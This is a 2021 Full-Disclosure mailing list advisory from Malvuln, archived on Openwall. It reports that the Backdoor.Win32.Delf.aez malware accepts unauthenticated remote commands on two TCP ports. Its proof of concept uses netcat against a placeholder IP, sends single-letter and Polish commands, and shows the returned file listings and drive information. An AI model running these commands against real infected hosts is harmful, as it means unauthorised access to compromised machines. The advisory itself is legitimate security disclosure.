lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 17 May 2021 21:56:48 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Delf.aez / Unauthenticated Remote Command
	Execution

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/be4a6274679ca966a1d99140db54c25a.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Delf.aez
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on several TCP ports and accepts
unauthenticated commands on port 53187 and 53184. Commands are in Polish
E.g. Wylogowuj translated is "Log out" and we get response "#Zmiany Profilu
w│aczone" ("#Profile change enabled."). Sending a single characters "d" or
"f" to port 53187 also returns system information.
Type: PE32
MD5: be4a6274679ca966a1d99140db54c25a
Vuln ID: MVID-2021-0217
Disclosure: 05/17/2021

Exploit/PoC:
nc64.exe x.x.x.x 53187
f
f 6
PerfLogs
Program Files
Program Files (x86)
Users
Windows
$WINRE_BACKUP_PARTITION.MARKER
0
bootmgr
398082
BOOTNXT
1
BOOTSECT.BAK
8192
pagefile.sys
671088640
swapfile.sys
16777216
d
d
C: - Dysk lokalny
D: - CD-ROM

nc64.exe x.x.x.x 53184
#Wylogowuj
#Zmiany Profilu w│aczone.       #Profile change enabled.


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ